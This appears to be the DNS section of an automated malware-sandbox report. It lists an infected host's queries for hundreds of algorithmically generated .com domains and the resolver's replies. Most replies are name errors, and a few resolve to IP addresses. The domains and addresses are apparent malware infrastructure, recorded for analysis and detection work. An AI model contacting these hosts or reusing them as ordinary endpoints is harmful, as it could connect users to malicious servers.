Nov 11, 2024 18:14:06.194150925 CET	192.168.2.6	1.1.1.1	0x977c	Standard query (0)	pufyxyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.195485115 CET	192.168.2.6	1.1.1.1	0xc46d	Standard query (0)	puzydog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.195693016 CET	192.168.2.6	1.1.1.1	0x8d05	Standard query (0)	qetyraq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.195983887 CET	192.168.2.6	1.1.1.1	0xb21	Standard query (0)	pupyteg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.196304083 CET	192.168.2.6	1.1.1.1	0xaefd	Standard query (0)	qekyvol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.196496010 CET	192.168.2.6	1.1.1.1	0xbb89	Standard query (0)	vofyzyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.196655035 CET	192.168.2.6	1.1.1.1	0x2892	Standard query (0)	purywoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.197279930 CET	192.168.2.6	1.1.1.1	0x308a	Standard query (0)	lykyvor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.197815895 CET	192.168.2.6	1.1.1.1	0xf58a	Standard query (0)	qebyhuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.199820995 CET	192.168.2.6	1.1.1.1	0x1d1c	Standard query (0)	lyxyfan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.200067043 CET	192.168.2.6	1.1.1.1	0x73df	Standard query (0)	gaqykoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.217153072 CET	192.168.2.6	1.1.1.1	0x9a5c	Standard query (0)	qeqyqul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.217432022 CET	192.168.2.6	1.1.1.1	0x2e1d	Standard query (0)	ganyhus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.218523026 CET	192.168.2.6	1.1.1.1	0x62d3	Standard query (0)	vopyrem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.218719006 CET	192.168.2.6	1.1.1.1	0xf179	Standard query (0)	lyrywoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.219343901 CET	192.168.2.6	1.1.1.1	0xfbcd	Standard query (0)	puvygyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.221718073 CET	192.168.2.6	1.1.1.1	0x3603	Standard query (0)	vojycit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.226248026 CET	192.168.2.6	1.1.1.1	0x5982	Standard query (0)	vofypuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.227822065 CET	192.168.2.6	1.1.1.1	0xd16a	Standard query (0)	gatyrah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.228017092 CET	192.168.2.6	1.1.1.1	0xbfc3	Standard query (0)	pujycil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.228056908 CET	192.168.2.6	1.1.1.1	0xb099	Standard query (0)	gahycuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.297807932 CET	192.168.2.6	1.1.1.1	0xcef3	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.300187111 CET	192.168.2.6	1.1.1.1	0x514d	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.301135063 CET	192.168.2.6	1.1.1.1	0xb284	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.310075045 CET	192.168.2.6	1.1.1.1	0x2e10	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.310739994 CET	192.168.2.6	1.1.1.1	0xd86	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.311224937 CET	192.168.2.6	1.1.1.1	0x81af	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.311671019 CET	192.168.2.6	1.1.1.1	0x6835	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.312320948 CET	192.168.2.6	1.1.1.1	0xb3ee	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.313481092 CET	192.168.2.6	1.1.1.1	0x377c	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.315752983 CET	192.168.2.6	1.1.1.1	0x5fb0	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.315989017 CET	192.168.2.6	1.1.1.1	0xe457	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.318478107 CET	192.168.2.6	1.1.1.1	0x5c0f	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.318609953 CET	192.168.2.6	1.1.1.1	0x4809	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.319395065 CET	192.168.2.6	1.1.1.1	0xb83c	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.319439888 CET	192.168.2.6	1.1.1.1	0x835c	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.327330112 CET	192.168.2.6	1.1.1.1	0xb3e3	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.329833984 CET	192.168.2.6	1.1.1.1	0xaa0a	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.331269026 CET	192.168.2.6	1.1.1.1	0xbffa	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.331861019 CET	192.168.2.6	1.1.1.1	0x6ab7	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.332479000 CET	192.168.2.6	1.1.1.1	0x851d	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.334216118 CET	192.168.2.6	1.1.1.1	0xb30f	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.351394892 CET	192.168.2.6	1.1.1.1	0x600d	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.363790035 CET	192.168.2.6	1.1.1.1	0x541f	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.364044905 CET	192.168.2.6	1.1.1.1	0x423c	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.364217043 CET	192.168.2.6	1.1.1.1	0x86b1	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.364329100 CET	192.168.2.6	1.1.1.1	0x52b0	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.364510059 CET	192.168.2.6	1.1.1.1	0x7f46	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.364651918 CET	192.168.2.6	1.1.1.1	0xe41e	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.369400024 CET	192.168.2.6	1.1.1.1	0xcaac	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.369714975 CET	192.168.2.6	1.1.1.1	0x4517	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.369874954 CET	192.168.2.6	1.1.1.1	0xfc77	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.369946003 CET	192.168.2.6	1.1.1.1	0x7eaa	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.370064974 CET	192.168.2.6	1.1.1.1	0x326f	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.370141983 CET	192.168.2.6	1.1.1.1	0xd12f	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.370249987 CET	192.168.2.6	1.1.1.1	0xec37	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.370316029 CET	192.168.2.6	1.1.1.1	0x77f0	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.370970964 CET	192.168.2.6	1.1.1.1	0x5f57	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.371392965 CET	192.168.2.6	1.1.1.1	0xaaf	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.371628046 CET	192.168.2.6	1.1.1.1	0xf887	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.374277115 CET	192.168.2.6	1.1.1.1	0xceaf	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.374516010 CET	192.168.2.6	1.1.1.1	0xa33	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.375988007 CET	192.168.2.6	1.1.1.1	0x2f04	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.376708984 CET	192.168.2.6	1.1.1.1	0x9861	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.377469063 CET	192.168.2.6	1.1.1.1	0x549a	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.377526999 CET	192.168.2.6	1.1.1.1	0x295f	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.377697945 CET	192.168.2.6	1.1.1.1	0xb804	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.377720118 CET	192.168.2.6	1.1.1.1	0x26ff	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.377888918 CET	192.168.2.6	1.1.1.1	0xbcba	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.389161110 CET	192.168.2.6	1.1.1.1	0x7d79	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.389869928 CET	192.168.2.6	1.1.1.1	0x365c	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.390172005 CET	192.168.2.6	1.1.1.1	0xd298	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.390633106 CET	192.168.2.6	1.1.1.1	0xb9bb	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.390719891 CET	192.168.2.6	1.1.1.1	0x359f	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.390810966 CET	192.168.2.6	1.1.1.1	0xc0f2	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.390923977 CET	192.168.2.6	1.1.1.1	0x57d1	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.390973091 CET	192.168.2.6	1.1.1.1	0x92ce	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.393615961 CET	192.168.2.6	1.1.1.1	0xdafe	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.394156933 CET	192.168.2.6	1.1.1.1	0xa6a	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.394202948 CET	192.168.2.6	1.1.1.1	0xb237	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.394395113 CET	192.168.2.6	1.1.1.1	0xffd	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.394469023 CET	192.168.2.6	1.1.1.1	0xb58f	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.399776936 CET	192.168.2.6	1.1.1.1	0xecaa	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.404320955 CET	192.168.2.6	1.1.1.1	0xa49c	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.404335976 CET	192.168.2.6	1.1.1.1	0xb8cf	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.864609957 CET	192.168.2.6	1.1.1.1	0x29a9	Standard query (0)	www.gahyqah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.559526920 CET	192.168.2.6	1.1.1.1	0xfd49	Standard query (0)	puvylyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.559528112 CET	192.168.2.6	1.1.1.1	0x6c4	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.570791006 CET	192.168.2.6	1.1.1.1	0xc990	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.571510077 CET	192.168.2.6	1.1.1.1	0xb15e	Standard query (0)	vocykem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.574357986 CET	192.168.2.6	1.1.1.1	0xdc10	Standard query (0)	ganyzub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.575880051 CET	192.168.2.6	1.1.1.1	0x82dc	Standard query (0)	lykymox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.575880051 CET	192.168.2.6	1.1.1.1	0x6c71	Standard query (0)	qebylug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.576816082 CET	192.168.2.6	1.1.1.1	0xed9f	Standard query (0)	vopydek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.577622890 CET	192.168.2.6	1.1.1.1	0x8acd	Standard query (0)	pujymip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.577775002 CET	192.168.2.6	1.1.1.1	0x4a5a	Standard query (0)	qetysal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.578773975 CET	192.168.2.6	1.1.1.1	0x4ab2	Standard query (0)	gatydaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.580812931 CET	192.168.2.6	1.1.1.1	0x2fde	Standard query (0)	gahynus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.580812931 CET	192.168.2.6	1.1.1.1	0x85c4	Standard query (0)	qeqylyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.581500053 CET	192.168.2.6	1.1.1.1	0xe8b6	Standard query (0)	vojymic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.582324982 CET	192.168.2.6	1.1.1.1	0xa980	Standard query (0)	lyvylyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.582324982 CET	192.168.2.6	1.1.1.1	0x19d3	Standard query (0)	qekyhil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.582788944 CET	192.168.2.6	1.1.1.1	0xda30	Standard query (0)	lymylyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.584439039 CET	192.168.2.6	1.1.1.1	0xb694	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.584439039 CET	192.168.2.6	1.1.1.1	0x3ce5	Standard query (0)	volymum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.585284948 CET	192.168.2.6	1.1.1.1	0x9829	Standard query (0)	gadydas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.588001966 CET	192.168.2.6	1.1.1.1	0x85ef	Standard query (0)	puzymig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.590327024 CET	192.168.2.6	1.1.1.1	0xf846	Standard query (0)	qexyqog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.591521025 CET	192.168.2.6	1.1.1.1	0x60c	Standard query (0)	vofydac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.592483997 CET	192.168.2.6	1.1.1.1	0x6244	Standard query (0)	lyxymin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.594722033 CET	192.168.2.6	1.1.1.1	0xd849	Standard query (0)	gaqyzuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.596915007 CET	192.168.2.6	1.1.1.1	0x4088	Standard query (0)	pufydep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.598718882 CET	192.168.2.6	1.1.1.1	0x9e4c	Standard query (0)	vowyzuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.598718882 CET	192.168.2.6	1.1.1.1	0xcf6a	Standard query (0)	lygyfex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.599855900 CET	192.168.2.6	1.1.1.1	0x32d4	Standard query (0)	gacyqob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.601552010 CET	192.168.2.6	1.1.1.1	0xa0b0	Standard query (0)	puryxuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.604542971 CET	192.168.2.6	1.1.1.1	0x6cce	Standard query (0)	qegyfyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.604862928 CET	192.168.2.6	1.1.1.1	0x64ef	Standard query (0)	vocyqaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.606789112 CET	192.168.2.6	1.1.1.1	0x36cf	Standard query (0)	lyryxij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.606925964 CET	192.168.2.6	1.1.1.1	0x3185	Standard query (0)	puvywav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.610119104 CET	192.168.2.6	1.1.1.1	0xacf0	Standard query (0)	gahyfyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.610119104 CET	192.168.2.6	1.1.1.1	0x4d59	Standard query (0)	qetyxiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.612088919 CET	192.168.2.6	1.1.1.1	0x595b	Standard query (0)	vojygut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.612088919 CET	192.168.2.6	1.1.1.1	0xc3d6	Standard query (0)	lyvywed.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.613431931 CET	192.168.2.6	1.1.1.1	0x5b41	Standard query (0)	gatycoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.613432884 CET	192.168.2.6	1.1.1.1	0x9846	Standard query (0)	pujygul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.615137100 CET	192.168.2.6	1.1.1.1	0xf82b	Standard query (0)	qebyrev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.616738081 CET	192.168.2.6	1.1.1.1	0x7fa	Standard query (0)	vopycom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.618119955 CET	192.168.2.6	1.1.1.1	0x47ab	Standard query (0)	lykygur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.619657040 CET	192.168.2.6	1.1.1.1	0xb24a	Standard query (0)	ganyrys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.620714903 CET	192.168.2.6	1.1.1.1	0xab17	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.621684074 CET	192.168.2.6	1.1.1.1	0xebe1	Standard query (0)	vonyryc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.623671055 CET	192.168.2.6	1.1.1.1	0xa113	Standard query (0)	galyhiw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.624412060 CET	192.168.2.6	1.1.1.1	0x7a50	Standard query (0)	pumytup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.625715971 CET	192.168.2.6	1.1.1.1	0x858	Standard query (0)	qedyveg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.625715971 CET	192.168.2.6	1.1.1.1	0x7ace	Standard query (0)	volyjok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.628927946 CET	192.168.2.6	1.1.1.1	0xd47e	Standard query (0)	gadyveb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.628927946 CET	192.168.2.6	1.1.1.1	0x4bb6	Standard query (0)	lymytux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.630393982 CET	192.168.2.6	1.1.1.1	0xd0cc	Standard query (0)	puzyjoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.632217884 CET	192.168.2.6	1.1.1.1	0x5694	Standard query (0)	qeqytup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.632217884 CET	192.168.2.6	1.1.1.1	0x4be1	Standard query (0)	vofybyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.633241892 CET	192.168.2.6	1.1.1.1	0x3ff4	Standard query (0)	lyxyjaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.634788990 CET	192.168.2.6	1.1.1.1	0x439f	Standard query (0)	lygynud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.635451078 CET	192.168.2.6	1.1.1.1	0x706e	Standard query (0)	gaqypiz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.636904955 CET	192.168.2.6	1.1.1.1	0x5730	Standard query (0)	qexykaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.636904955 CET	192.168.2.6	1.1.1.1	0xb6bd	Standard query (0)	pufybyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.638010025 CET	192.168.2.6	1.1.1.1	0xb9a4	Standard query (0)	vowypit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.638969898 CET	192.168.2.6	1.1.1.1	0x47a4	Standard query (0)	gacykeh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.640263081 CET	192.168.2.6	1.1.1.1	0xef53	Standard query (0)	purypol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:59.640485048 CET	192.168.2.6	1.1.1.1	0x858e	Standard query (0)	qegynuv.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 11, 2024 18:13:00.492011070 CET	1.1.1.1	192.168.2.6	0xec54	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.493460894 CET	1.1.1.1	192.168.2.6	0xb947	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.497566938 CET	1.1.1.1	192.168.2.6	0x1f6d	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.497566938 CET	1.1.1.1	192.168.2.6	0x1f6d	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.499924898 CET	1.1.1.1	192.168.2.6	0xfa3	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.503657103 CET	1.1.1.1	192.168.2.6	0x5db6	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.505531073 CET	1.1.1.1	192.168.2.6	0x6e7e	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.507329941 CET	1.1.1.1	192.168.2.6	0x51a1	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.507906914 CET	1.1.1.1	192.168.2.6	0x3ea7	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.510741949 CET	1.1.1.1	192.168.2.6	0x7b8d	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.512943029 CET	1.1.1.1	192.168.2.6	0x1342	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.514404058 CET	1.1.1.1	192.168.2.6	0xe520	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.520409107 CET	1.1.1.1	192.168.2.6	0xce56	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.522640944 CET	1.1.1.1	192.168.2.6	0xc447	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.530391932 CET	1.1.1.1	192.168.2.6	0xde63	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.538754940 CET	1.1.1.1	192.168.2.6	0x3295	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.541436911 CET	1.1.1.1	192.168.2.6	0x3f7e	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.561302900 CET	1.1.1.1	192.168.2.6	0x5bd5	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.589627981 CET	1.1.1.1	192.168.2.6	0xd619	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.607372999 CET	1.1.1.1	192.168.2.6	0xdfeb	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.631576061 CET	1.1.1.1	192.168.2.6	0x7fd8	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.638607979 CET	1.1.1.1	192.168.2.6	0xd69b	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.690432072 CET	1.1.1.1	192.168.2.6	0x6265	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.695362091 CET	1.1.1.1	192.168.2.6	0x78bb	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.695362091 CET	1.1.1.1	192.168.2.6	0x78bb	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.695362091 CET	1.1.1.1	192.168.2.6	0x78bb	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.695362091 CET	1.1.1.1	192.168.2.6	0x78bb	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.695362091 CET	1.1.1.1	192.168.2.6	0x78bb	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.695362091 CET	1.1.1.1	192.168.2.6	0x78bb	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.695362091 CET	1.1.1.1	192.168.2.6	0x78bb	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.695362091 CET	1.1.1.1	192.168.2.6	0x78bb	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.701733112 CET	1.1.1.1	192.168.2.6	0x66e1	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.722973108 CET	1.1.1.1	192.168.2.6	0xbbf2	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.731503963 CET	1.1.1.1	192.168.2.6	0xb32	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.732952118 CET	1.1.1.1	192.168.2.6	0x5760	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.765234947 CET	1.1.1.1	192.168.2.6	0x9721	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.774240971 CET	1.1.1.1	192.168.2.6	0x4680	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.785746098 CET	1.1.1.1	192.168.2.6	0x5bab	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
